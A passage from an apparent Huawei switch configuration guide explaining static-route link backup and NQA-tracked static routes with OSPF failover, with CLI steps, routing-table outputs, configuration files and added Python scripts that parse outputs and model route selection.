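                active.append(Route(r.prefix, r.proto, r.pre, r.nexthop, via[0].iface))
    return active


def next_hops(table: List[Route], dst: str, down: Set[str] = frozenset()) -> Set[str]:
    """Next hops a device would use for dst while the interfaces in `down` are down."""
    return {str(r.nexthop) for r in lookup(active_routes(table, down), IPv4(dst))}


def owner(devices: Dict[str, List[Route]], addr: IPv4) -> str:
    """Name of the device whose interface carries addr, or "" if none does."""
    for name, table in devices.items():
        if any(r.proto == "Direct" and r.nexthop == addr for r in table):
            return name
    return ""


def trace(devices: Dict[str, List[Route]], start: str, dst: str) -> List[str]:
    """Walk hop by hop like tracert: a transit device answers from the address the
    previous hop used as next hop, the destination answers with dst itself."""
    target = IPv4(dst)
    dst_dev, hops, dev = owner(devices, target), [], start
    for _ in range(30):                        # max hops: 30, as in the tracert output
        if dev == dst_dev:
            return hops + [dst]
        best = lookup(active_routes(devices[dev]), target)
        if not best:
            raise LookupError(f"{dev}: no route to {dst}")
        r = min(best, key=lambda x: int(x.nexthop))   # equal-cost: a switch hashes per flow
        if r.proto == "Direct":                # dst is on-link: the host itself answers
            return hops + [dst]
        dev = owner(devices, r.nexthop)
        if not dev:
            raise LookupError(f"next hop {r.nexthop} belongs to no known device")
        if dev != dst_dev:
            hops.append(str(r.nexthop))
    raise LookupError("hop limit reached")


# 9.1.1 (Figure 9-1): VLANIF addresses and the static routes of Step 4.
SEG_9_1_1 = {
    "SwitchA": [direct("10.1.4.1/30", "Vlanif10"), direct("10.1.1.1/24", "Vlanif30"),
                static("0.0.0.0/0", "10.1.4.2")],
    "SwitchB": [direct("10.1.4.2/30", "Vlanif10"), direct("10.1.4.5/30", "Vlanif20"),
                direct("10.1.2.1/24", "Vlanif40"), static("10.1.1.0/24", "10.1.4.1"),
                static("10.1.3.0/24", "10.1.4.6")],
    "SwitchC": [direct("10.1.4.6/30", "Vlanif20"), direct("10.1.3.1/24", "Vlanif50"),
                static("0.0.0.0/0", "10.1.4.5")],
}
# 9.1.2 (Figure 9-2): SwitchA with two equal-cost static routes to 10.1.2.0/24.
ECMP_SWITCH_A = [direct("10.1.1.1/24", "Vlanif10"), direct("192.168.12.1/24", "Vlanif100"),
                 direct("192.168.14.1/24", "Vlanif400"),
                 static("10.1.2.0/24", "192.168.12.2"), static("10.1.2.0/24", "192.168.14.2")]

if __name__ == "__main__":
    print(trace(SEG_9_1_1, "SwitchA", "10.1.3.1"), sorted(next_hops(ECMP_SWITCH_A, "10.1.2.2")))
```

Giving the second 10.1.2.0/24 route a higher preference value (a constructed pre=100) turns the 9.1.2 table into a primary/backup pair: only the SwitchB next hop is used until Vlanif100 goes down.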


Relevant Information
Video
How to Configure a Static Route
How to Configure a Default Route
How to Configure a Floating Static Route

9.1.3 Example for Configuring Static Routes for Link Backup

Static Route Overview
Static routes are manually configured by administrators. Static routes use less bandwidth than
dynamic routes and do not use CPU resources for route calculation and update analysis. When
a network fault occurs or the topology changes, static routes cannot be automatically updated
and must be manually reconfigured to adapt to the network change. Static routes have five
parameters: destination IP address, mask, outbound interface, next hop, and priority.
Static routes are easy to configure and control, and meet network requirements on a simple
network. On a complex network, static routes can also be configured to improve network
performance and ensure bandwidth for important applications.

Configuration Notes
- Communication between two devices is bidirectional, so reachable routes must be
available in both directions. To enable two devices to communicate through static routes,
configure a static route on the local device and then configure a return route on the peer
device.
- If an enterprise network has two egresses, two equal-cost static routes can be configured
for load balancing so that traffic is evenly balanced between the two links. Alternatively,
two non-equal-cost static routes can be configured for active/standby backup: when the
active link is faulty, traffic is switched from the active link to the standby link.

Networking Requirements
On the network shown in Figure 9-3, PC1 and PC2 are connected through four Switches.
Data traffic of PC1 can reach PC2 through two links: PC1-SwitchA-SwitchB-SwitchC-PC2
and PC1-SwitchA-SwitchD-SwitchC-PC2. To improve reliability, users want to implement
backup between the two links. That is, traffic from PC1 to PC2 is first transmitted through the
link that passes through SwitchB. When faults occur on this link, traffic is automatically
switched to the link that passes through SwitchD.

NOTE

In this scenario, ensure that all connected interfaces have STP disabled. If STP is enabled and VLANIF
interfaces of switches are used to construct a Layer 3 ring network, an interface on the network may be
blocked. As a result, Layer 3 services on the network cannot run normally.


Figure 9-3 Configuring static routes for link backup
[Figure: PC1 (10.1.1.2) - SwitchA GE1/0/1 (VLANIF10, 10.1.1.1/24). Upper link: SwitchA GE1/0/2
(VLANIF100, 192.168.12.1/24) - SwitchB GE1/0/1 (VLANIF100, 192.168.12.2/24); SwitchB GE1/0/2
(VLANIF200, 192.168.23.1/24) - SwitchC GE1/0/2 (VLANIF200, 192.168.23.2/24). Lower link: SwitchA
GE1/0/3 (VLANIF400, 192.168.14.1/24) - SwitchD GE1/0/1 (VLANIF400, 192.168.14.2/24); SwitchD
GE1/0/2 (VLANIF300, 192.168.34.2/24) - SwitchC GE1/0/3 (VLANIF300, 192.168.34.1/24). SwitchC
GE1/0/1 (VLANIF20, 10.1.2.1/24) - PC2 (10.1.2.2).]

Configuration Roadmap
The configuration roadmap is as follows:

1. Create VLANs, add interfaces to the VLANs, and assign IP addresses to VLANIF
interfaces.
2. Configure static routes in two directions of data traffic.
3. Configure default gateways for hosts.

Procedure
Step 1 Specify the VLANs to which interfaces belong.

# Configure SwitchA. The configurations of SwitchB, SwitchC, and SwitchD are similar to
the configuration of SwitchA, and are not mentioned here.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 10 100 400
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type access
[SwitchA-GigabitEthernet1/0/1] port default vlan 10
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type trunk
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] port link-type trunk
[SwitchA-GigabitEthernet1/0/3] port trunk allow-pass vlan 400
[SwitchA-GigabitEthernet1/0/3] quit

Step 2 Configure an IP address for each VLANIF interface.

# Configure SwitchA. The configurations of SwitchB, SwitchC, and SwitchD are similar to
the configuration of SwitchA, and are not mentioned here.
[SwitchA] interface vlanif 10
[SwitchA-Vlanif10] ip address 10.1.1.1 24
[SwitchA-Vlanif10] quit
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] ip address 192.168.12.1 24
[SwitchA-Vlanif100] quit
[SwitchA] interface vlanif 400
[SwitchA-Vlanif400] ip address 192.168.14.1 24
[SwitchA-Vlanif400] quit

Step 3 Configure hosts.


Assign IP address 10.1.1.2/24 and default gateway IP address 10.1.1.1 to PC1; assign IP
address 10.1.2.2/24 and default gateway IP address 10.1.2.1 to PC2.
Step 4 Configure static routes from PC1 to PC2.
# On SwitchA, configure two static routes with different preferences whose next hops point
to SwitchB and SwitchD respectively. Data traffic is then forwarded to SwitchB first; when
the link through SwitchB fails, the traffic is automatically switched to SwitchD.
[SwitchA] ip route-static 10.1.2.0 24 192.168.12.2
[SwitchA] ip route-static 10.1.2.0 24 192.168.14.2 preference 70

# Configure SwitchB.
[SwitchB] ip route-static 10.1.2.0 24 192.168.23.2

# Configure SwitchD.
[SwitchD] ip route-static 10.1.2.0 24 192.168.34.1

Step 5 Configure static routes from PC2 to PC1 and ensure that the active and standby links are
the same in both directions.
# On SwitchC, configure two static routes with different preferences whose next hops point
to SwitchB and SwitchD respectively. Data traffic is then forwarded to SwitchB first; when
the link through SwitchB fails, the traffic is automatically switched to SwitchD.
[SwitchC] ip route-static 10.1.1.0 24 192.168.23.1
[SwitchC] ip route-static 10.1.1.0 24 192.168.34.2 preference 70

# Configure SwitchB.
[SwitchB] ip route-static 10.1.1.0 24 192.168.12.1

# Configure SwitchD.
[SwitchD] ip route-static 10.1.1.0 24 192.168.14.1

Step 6 Verify the configuration.


# Check the IP routing table on SwitchA.
[SwitchA] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 9 Routes : 9

Destination/Mask Proto Pre Cost Flags NextHop Interface

10.1.1.0/24 Direct 0 0 D 10.1.1.1 Vlanif10
10.1.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif10
10.1.2.0/24 Static 60 0 RD 192.168.12.2 Vlanif100
127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1 InLoopBack0
192.168.12.0/24 Direct 0 0 D 192.168.12.1 Vlanif100
192.168.12.1/32 Direct 0 0 D 127.0.0.1 Vlanif100
192.168.14.0/24 Direct 0 0 D 192.168.14.1 Vlanif400
192.168.14.1/32 Direct 0 0 D 127.0.0.1 Vlanif400

# Check detailed information about the IP routing table on SwitchA.


[SwitchA] display ip routing-table 10.1.2.0 24 verbose
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Table : Public
Summary Count : 2

Destination: 10.1.2.0/24
Protocol: Static Process ID: 0
Preference: 60 Cost: 0
NextHop: 192.168.12.2 Neighbour: 0.0.0.0
State: Active Adv Relied Age: 00h13m13s
Tag: 0 Priority: medium
Label: NULL QoSInfo: 0x0
IndirectID: 0x80000001
RelayNextHop: 0.0.0.0 Interface: Vlanif100
TunnelID: 0x0 Flags: RD

Destination: 10.1.2.0/24
Protocol: Static Process ID: 0
Preference: 70 Cost: 0
NextHop: 192.168.14.2 Neighbour: 0.0.0.0
State: Inactive Adv Relied Age: 00h00m45s
Tag: 0 Priority: medium
Label: NULL QoSInfo: 0x0
IndirectID: 0x80000002
RelayNextHop: 0.0.0.0 Interface: Vlanif400
TunnelID: 0x0 Flags: R

The IP routing table on SwitchA contains only one active route to network segment
10.1.2.0/24. Normally, data traffic from PC1 to PC2 is transmitted through the link that passes
through SwitchB. Detailed information about the IP routing table on SwitchA shows two
routes to network segment 10.1.2.0/24: one Active route that passes through SwitchB and the
other Inactive route that passes through SwitchD. When faults occur on the active link, the
Inactive route will become active to take over the traffic. This implements link backup.
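As an added example (not part of the Huawei document), the following Python script parses the verbose routing-table output above, checks the active/standby relationship between the two static routes, and models which route becomes active when the SwitchB next hop is unreachable. The sample output is a constructed copy of the page's output, and the selection logic is a plain preference comparison written here, not the switch's own code.

```python
"""Added example (not from the Huawei document): parse the verbose output of
'display ip routing-table 10.1.2.0 24 verbose' and check the active/standby pair."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Constructed copy of the verbose output shown on SwitchA in Step 6.
VERBOSE_OUTPUT = """\
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Table : Public
Summary Count : 2

Destination: 10.1.2.0/24
Protocol: Static Process ID: 0
Preference: 60 Cost: 0
NextHop: 192.168.12.2 Neighbour: 0.0.0.0
State: Active Adv Relied Age: 00h13m13s
Tag: 0 Priority: medium
Label: NULL QoSInfo: 0x0
IndirectID: 0x80000001
RelayNextHop: 0.0.0.0 Interface: Vlanif100
TunnelID: 0x0 Flags: RD

Destination: 10.1.2.0/24
Protocol: Static Process ID: 0
Preference: 70 Cost: 0
NextHop: 192.168.14.2 Neighbour: 0.0.0.0
State: Inactive Adv Relied Age: 00h00m45s
Tag: 0 Priority: medium
Label: NULL QoSInfo: 0x0
IndirectID: 0x80000002
RelayNextHop: 0.0.0.0 Interface: Vlanif400
TunnelID: 0x0 Flags: R
"""


@dataclass
class Route:
    destination: str
    protocol: str
    preference: int   # VRP preference: the lower value wins
    next_hop: str
    state: str        # first word of the State field: Active or Inactive
    interface: str


# Fields appear as "Name: value", sometimes two per line. The \b keeps "NextHop:"
# from also matching inside "RelayNextHop:".
_FIELD = re.compile(
    r"\b(Destination|Protocol|Preference|NextHop|State|Interface):\s*(\S+)")


def parse_verbose(text: str) -> List[Route]:
    """Each route is a blank-line-separated block; the header block has no Destination."""
    routes: List[Route] = []
    for block in re.split(r"\n\s*\n", text):
        fields = dict(_FIELD.findall(block))
        if "Destination" not in fields:
            continue
        routes.append(Route(fields["Destination"], fields["Protocol"],
                            int(fields["Preference"]), fields["NextHop"],
                            fields["State"], fields["Interface"]))
    return routes


def check_backup(routes: List[Route]) -> Dict[str, str]:
    """Checks worth scripting after Step 6: exactly one Active and one Inactive
    route to the prefix, and the Inactive one carries the higher preference value
    (70 versus 60 here); otherwise the "backup" route would never be standby."""
    active = [r for r in routes if r.state == "Active"]
    inactive = [r for r in routes if r.state == "Inactive"]
    if len(active) != 1 or len(inactive) != 1:
        raise ValueError("expected exactly one Active and one Inactive route")
    if active[0].preference >= inactive[0].preference:
        raise ValueError("standby route must have a higher preference value")
    return {"active_via": active[0].next_hop, "standby_via": inactive[0].next_hop}


def select_active(routes: List[Route],
                  unreachable: Optional[Set[str]] = None) -> Optional[Route]:
    """Model of the selection the page describes: among static routes to one
    prefix whose next hop is still reachable, the lowest preference value is
    installed. `unreachable` holds next hops taken down by a simulated fault."""
    down = unreachable or set()
    usable = [r for r in routes if r.next_hop not in down]
    return min(usable, key=lambda r: r.preference, default=None)


if __name__ == "__main__":
    parsed = parse_verbose(VERBOSE_OUTPUT)
    print(check_backup(parsed))
    failover = select_active(parsed, {"192.168.12.2"})
    print("after SwitchB link fault:", failover.next_hop if failover else None)
```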

----End

Configuration Files
- SwitchA configuration file
#
sysname SwitchA
#
vlan batch 10 100 400
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif100
ip address 192.168.12.1 255.255.255.0
#
interface Vlanif400
ip address 192.168.14.1 255.255.255.0
#

interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 400
#
ip route-static 10.1.2.0 255.255.255.0 192.168.12.2
ip route-static 10.1.2.0 255.255.255.0 192.168.14.2 preference 70
#
return
- SwitchB configuration file
#
sysname SwitchB
#
vlan batch 100 200
#
interface Vlanif100
ip address 192.168.12.2 255.255.255.0
#
interface Vlanif200
ip address 192.168.23.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 200
#
ip route-static 10.1.1.0 255.255.255.0 192.168.12.1
ip route-static 10.1.2.0 255.255.255.0 192.168.23.2
#
return
- SwitchC configuration file
#
sysname SwitchC
#
vlan batch 20 200 300
#
interface Vlanif20
ip address 10.1.2.1 255.255.255.0
#
interface Vlanif200
ip address 192.168.23.2 255.255.255.0
#
interface Vlanif300
ip address 192.168.34.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 20
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 200
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 300
#
ip route-static 10.1.1.0 255.255.255.0 192.168.23.1
ip route-static 10.1.1.0 255.255.255.0 192.168.34.2 preference 70
#
return
- SwitchD configuration file
#
sysname SwitchD
#
vlan batch 300 400
#
interface Vlanif300
ip address 192.168.34.2 255.255.255.0
#
interface Vlanif400
ip address 192.168.14.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 400
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 300
#
ip route-static 10.1.1.0 255.255.255.0 192.168.14.1
ip route-static 10.1.2.0 255.255.255.0 192.168.34.1
#
return

Relevant Information
Video

How to Configure a Static Route

How to Configure a Default Route

How to Configure a Floating Static Route

9.1.4 Example for Configuring NQA for IPv4 Static Routes

Overview of NQA for IPv4 Static Routes


The network quality analysis (NQA) technology measures network performance and collects
statistics on delay, jitter, and packet loss ratio. NQA measures network QoS in real time and
supports effective fault diagnosis and location.

On a simple network or when the route to the destination cannot be established using dynamic
routing protocols, static routes can be configured. Unlike dynamic routing protocols, static
routes do not have a dedicated detection mechanism. If a fault occurs, static routes cannot
detect the fault, and the network administrator must delete the corresponding static route. This
delays the link switchover and may cause lengthy service interruptions.

BFD for IPv4 static routes is adaptable to link changes but both ends of the link must support
BFD. If either end of a link does not support BFD, NQA for IPv4 static routes can be
configured. When an NQA test instance detects a link fault, it instructs the routing
management module to delete the associated static route from the IP routing table. Then
service traffic switches to a route without any link fault to prevent lengthy service
interruptions.

Configuration Notes
- The NQA function of the S12700 can be used only when a license is available. If the
license is unavailable, the NQA commands can be run on the S12700, but the NQA
function does not take effect.

Networking Requirements
On the company network shown in Figure 9-4, access switches SwitchD and SwitchE connect
to aggregation switches SwitchB and SwitchC in dual-homing mode through static routes to
implement redundancy. The requirements are as follows:
- A detection mechanism is deployed for the static routes so that link faults are detected and
traffic is switched away from a faulty link, preventing lengthy service interruptions.
- In normal cases, traffic is transmitted along the primary link SwitchB→SwitchD.
- When the primary link becomes faulty, traffic switches to the backup link
SwitchC→SwitchD.

NOTE

In this scenario, ensure that all connected interfaces have STP disabled. If STP is enabled and VLANIF
interfaces of switches are used to construct a Layer 3 ring network, an interface on the network may be
blocked. As a result, Layer 3 services on the network cannot run normally.

Figure 9-4 NQA for IPv4 static routes
(Figure content: SwitchA connects upstream to the IP network and downstream to SwitchB over GE1/0/1 (VLANIF 30) and to SwitchC over GE1/0/2 (VLANIF 40). SwitchB reaches SwitchD over GE1/0/3 (VLANIF 10) and SwitchE over GE1/0/2 (VLANIF 50); SwitchC reaches SwitchE over GE1/0/3 (VLANIF 20) and SwitchD over GE1/0/2 (VLANIF 60). SwitchD serves Client 1 to Client 10 on GE1/0/4 (VLANIF 70); SwitchE serves Client 91 to Client 100 on GE1/0/4 (VLANIF 80). Interface addresses are listed in the table below.)

Device Name   Interface   IP Address
SwitchA       VLANIF 30   192.168.3.1/24
SwitchA       VLANIF 40   192.168.4.1/24
SwitchB       VLANIF 30   192.168.3.2/24
SwitchB       VLANIF 50   192.168.5.1/24
SwitchB       VLANIF 10   192.168.1.1/24
SwitchC       VLANIF 40   192.168.4.2/24
SwitchC       VLANIF 60   192.168.6.1/24
SwitchC       VLANIF 20   192.168.2.1/24
SwitchD       VLANIF 10   192.168.1.2/24
SwitchD       VLANIF 60   192.168.6.2/24
SwitchD       VLANIF 70   192.168.7.1/24
SwitchE       VLANIF 20   192.168.2.2/24
SwitchE       VLANIF 50   192.168.5.2/24
SwitchE       VLANIF 80   192.168.8.1/24

Configuration Roadmap
1. Create an Internet Control Message Protocol (ICMP) NQA test instance to monitor the
status of the primary link.
Create an ICMP NQA test instance on the NQA client SwitchB to test whether the
primary link SwitchB→SwitchD is running properly.
2. Configure static routes and associate the static routes with the NQA test instance.
Configure static routes on aggregation switches SwitchB and SwitchC, and associate the
static route configured on SwitchB with the ICMP NQA test instance. When the ICMP
NQA test instance detects a link fault, it instructs the routing management module to
delete the associated static route from the IPv4 routing table.
3. Configure a dynamic routing protocol. Configure a dynamic routing protocol on
aggregation switches SwitchA, SwitchB, and SwitchC so that they can learn routes from
each other.
4. Configure the dynamic routing protocol to import static routes, and set a higher cost for
the static route used for the backup link than for the static route used for the primary link
to improve link reliability.
Configure the dynamic routing protocol on aggregation switches SwitchB and SwitchC
to import static routes, and set a higher cost for the static route imported by SwitchC than
for the static route imported by SwitchB. This configuration allows SwitchA to
preferentially select the link SwitchB→SwitchD with a lower cost.

Procedure
Step 1 Specify the VLANs to which the interfaces belong.
# Configure SwitchA. Configure SwitchB, SwitchC, SwitchD, and SwitchE in the same way,
using the interfaces and VLANs shown in Figure 9-4.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 30 40
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 30
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type trunk
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 40
[SwitchA-GigabitEthernet1/0/2] quit

Step 2 Configure an IP address for each VLANIF interface.


# Configure SwitchA. Configure SwitchB, SwitchC, SwitchD, and SwitchE in the same way,
using the VLANIF interfaces and IP addresses listed for Figure 9-4.
[SwitchA] interface vlanif 30
[SwitchA-Vlanif30] ip address 192.168.3.1 24
[SwitchA-Vlanif30] quit
[SwitchA] interface vlanif 40
[SwitchA-Vlanif40] ip address 192.168.4.1 24
[SwitchA-Vlanif40] quit

Step 3 Create an NQA test instance on SwitchB to test the link between SwitchB and SwitchD.
[SwitchB] nqa test-instance user test //Create an NQA test instance with the administrator name user and the instance name test.
[SwitchB-nqa-user-test] test-type icmp //Set the test type of the NQA test instance to ICMP.
[SwitchB-nqa-user-test] destination-address ipv4 192.168.1.2 //Set the destination address of the NQA test instance to 192.168.1.2 (SwitchD).
[SwitchB-nqa-user-test] frequency 10 //Set the interval between consecutive NQA tests to 10s.
[SwitchB-nqa-user-test] probe-count 2 //Set the number of probes sent in each test to 2.
[SwitchB-nqa-user-test] interval seconds 5 //Set the interval at which probe packets are sent to 5s.
[SwitchB-nqa-user-test] timeout 4 //Set the timeout period of a probe to 4s.
[SwitchB-nqa-user-test] start now
[SwitchB-nqa-user-test] quit

Step 4 Configure IPv4 static routes.


# Configure an IPv4 static route on SwitchB and associate it with the NQA test instance.
[SwitchB] ip route-static 192.168.7.0 255.255.255.0 Vlanif 10 192.168.1.2 track nqa user test

# Configure an IPv4 static route on SwitchC.


[SwitchC] ip route-static 192.168.7.0 255.255.255.0 Vlanif 60 192.168.6.2

Step 5 Configure a dynamic routing protocol on SwitchA, SwitchB, and SwitchC. OSPF is used in
this example.
# Configure OSPF on SwitchA.
[SwitchA] ospf 1 router-id 10.1.1.1
[SwitchA-ospf-1] area 0.0.0.0
[SwitchA-ospf-1-area-0.0.0.0] network 192.168.3.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 192.168.4.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] quit
[SwitchA-ospf-1] quit

# Configure OSPF on SwitchB.


[SwitchB] ospf 1 router-id 10.2.2.2
[SwitchB-ospf-1] area 0.0.0.0
[SwitchB-ospf-1-area-0.0.0.0] network 192.168.3.0 0.0.0.255
[SwitchB-ospf-1-area-0.0.0.0] quit
[SwitchB-ospf-1] quit

# Configure OSPF on SwitchC.


[SwitchC] ospf 1 router-id 10.3.3.3
[SwitchC-ospf-1] area 0.0.0.0
[SwitchC-ospf-1-area-0.0.0.0] network 192.168.4.0 0.0.0.255
[SwitchC-ospf-1-area-0.0.0.0] quit
[SwitchC-ospf-1] quit

Step 6 Configure OSPF on SwitchB and SwitchC to import static routes.


# Configure OSPF on SwitchB to import a static route, and set the cost to 10 for the static
route.
[SwitchB] ospf 1
[SwitchB-ospf-1] import-route static cost 10
[SwitchB-ospf-1] quit

# Configure OSPF on SwitchC to import a static route, and set the cost to 20 for the static
route.
[SwitchC] ospf 1
[SwitchC-ospf-1] import-route static cost 20
[SwitchC-ospf-1] quit

Step 7 Verify the configuration.


After the configuration is complete, run the display current-configuration | include nqa
command on aggregation switch SwitchB in the system view. The command output shows
that the IPv4 static route has been associated with the NQA test instance. Run the display nqa
results command. The command output shows that the NQA test instance has been created.
# Check configurations of NQA for IPv4 static routes.
[SwitchB] display current-configuration | include nqa
ip route-static 192.168.7.0 255.255.255.0 Vlanif10 192.168.1.2 track nqa user test
nqa test-instance user test

# Check NQA test results.


[SwitchB] display nqa results test-instance user test

NQA entry(user, test) :testflag is active ,testtype is icmp


1 . Test 288 result The test is finished
Send operation times: 2 Receive response times: 2
Completion:success RTD OverThresholds number: 0
Attempts number:1 Drop operation number:0
Disconnect operation number:0 Operation timeout number:0
System busy operation number:0 Connection fail number:0
Operation sequence errors number:0 RTT Status errors number:0
Destination ip address:192.168.1.2
Min/Max/Average Completion Time: 3/4/3
Sum/Square-Sum Completion Time: 7/25
Last Good Probe Time: 2014-09-09 09:55:38.2
Lost packet ratio: 0 %

The command output shows "Lost packet ratio 0 %," indicating that the link is running
properly.
# Check the IP routing table on SwitchB.
[SwitchB] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 10 Routes : 10

Destination/Mask Proto Pre Cost Flags NextHop Interface

127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1 InLoopBack0
192.168.1.0/24 Direct 0 0 D 192.168.1.1 Vlanif10
192.168.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif10
192.168.3.0/24 Direct 0 0 D 192.168.3.2 Vlanif30
192.168.3.2/32 Direct 0 0 D 127.0.0.1 Vlanif30
192.168.4.0/24 OSPF 10 2 D 192.168.3.1 Vlanif30
192.168.5.0/24 Direct 0 0 D 192.168.5.1 Vlanif50
192.168.5.1/32 Direct 0 0 D 127.0.0.1 Vlanif50
192.168.7.0/24 Static 60 0 D 192.168.1.2 Vlanif10

# Check the IP routing table on aggregation switch SwitchA.


[SwitchA] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 7 Routes : 7

Destination/Mask Proto Pre Cost Flags NextHop Interface

127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1 InLoopBack0
192.168.3.0/24 Direct 0 0 D 192.168.3.1 Vlanif30
192.168.3.1/32 Direct 0 0 D 127.0.0.1 Vlanif30
192.168.4.0/24 Direct 0 0 D 192.168.4.1 Vlanif40
192.168.4.1/32 Direct 0 0 D 127.0.0.1 Vlanif40
192.168.7.0/24 O_ASE 150 10 D 192.168.3.2 Vlanif30

The command output shows that a route to 192.168.7.0/24 exists in the routing table. The
route's next hop address is 192.168.3.2 and the cost is 10. Traffic is preferentially transmitted
along the link SwitchB -> SwitchD.
# Shut down GigabitEthernet1/0/3 on SwitchB to simulate a link fault.
[SwitchB] interface GigabitEthernet1/0/3
[SwitchB-GigabitEthernet1/0/3] shutdown
[SwitchB-GigabitEthernet1/0/3] quit

# Check NQA test results.


[SwitchB] display nqa results test-instance user test

NQA entry(user, test) :testflag is active ,testtype is icmp


1 . Test 309 result The test is finished
Send operation times: 2 Receive response times: 0
Completion:failed RTD OverThresholds number: 0
Attempts number:1 Drop operation number:2
Disconnect operation number:0 Operation timeout number:0
System busy operation number:0 Connection fail number:0
Operation sequence errors number:0 RTT Status errors number:0
Destination ip address:192.168.1.2
Min/Max/Average Completion Time: 0/0/0
Sum/Square-Sum Completion Time: 0/0
Last Good Probe Time: 0000-00-00 00:00:00.0
Lost packet ratio: 100 %

The command output shows "Completion:failed" and "Lost packet ratio is 100 %," indicating
that the link is faulty.
# Check the IP routing table on SwitchB.
[SwitchB] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 8 Routes : 8

Destination/Mask Proto Pre Cost Flags NextHop Interface

127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1 InLoopBack0
192.168.3.0/24 Direct 0 0 D 192.168.3.2 Vlanif30
192.168.3.2/32 Direct 0 0 D 127.0.0.1 Vlanif30
192.168.4.0/24 OSPF 10 2 D 192.168.3.1 Vlanif30
192.168.5.0/24 Direct 0 0 D 192.168.5.1 Vlanif50
192.168.5.1/32 Direct 0 0 D 127.0.0.1 Vlanif50
192.168.7.0/24 O_ASE 150 20 D 192.168.3.1 Vlanif30

The command output shows that the static route has been deleted.
# Check the IP routing table on SwitchA.
[SwitchA] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 7 Routes : 7

Destination/Mask Proto Pre Cost Flags NextHop Interface

127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1 InLoopBack0
192.168.3.0/24 Direct 0 0 D 192.168.3.1 Vlanif30
192.168.3.1/32 Direct 0 0 D 127.0.0.1 Vlanif30
192.168.4.0/24 Direct 0 0 D 192.168.4.1 Vlanif40
192.168.4.1/32 Direct 0 0 D 127.0.0.1 Vlanif40
192.168.7.0/24 O_ASE 150 20 D 192.168.4.2 Vlanif40

The static route has been associated with the NQA test instance on SwitchB. If NQA detects a
link fault, it rapidly notifies SwitchB that the associated static route is unavailable. SwitchA
cannot learn the route to 192.168.7.0/24 from SwitchB. However, SwitchA can learn the route
to 192.168.7.0/24 from SwitchC. The route's next hop address is 192.168.4.2, and the cost is
20. Traffic switches to the link SwitchC -> SwitchD.
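As an added example (not part of the Huawei document), this Python script reads the two display nqa results outputs shown above (constructed copies of the page's success and failure outputs), applies the rule the page describes, namely that a failed test removes the tracked static route from SwitchB, and derives which O_ASE route SwitchA then prefers by OSPF cost (10 via SwitchB, 20 via SwitchC). The route selection is a model of the behaviour described on this page, not device code.

```python
"""Added example (not from the Huawei document): interpret 'display nqa results'
output and derive the route SwitchA prefers for 192.168.7.0/24."""
import re
from dataclasses import dataclass
from typing import List

# Constructed copies of the two outputs shown in Step 7 (link up, then link down).
NQA_OK = """\
NQA entry(user, test) :testflag is active ,testtype is icmp
1 . Test 288 result The test is finished
Send operation times: 2 Receive response times: 2
Completion:success RTD OverThresholds number: 0
Attempts number:1 Drop operation number:0
Disconnect operation number:0 Operation timeout number:0
System busy operation number:0 Connection fail number:0
Operation sequence errors number:0 RTT Status errors number:0
Destination ip address:192.168.1.2
Min/Max/Average Completion Time: 3/4/3
Sum/Square-Sum Completion Time: 7/25
Last Good Probe Time: 2014-09-09 09:55:38.2
Lost packet ratio: 0 %
"""
NQA_FAIL = """\
NQA entry(user, test) :testflag is active ,testtype is icmp
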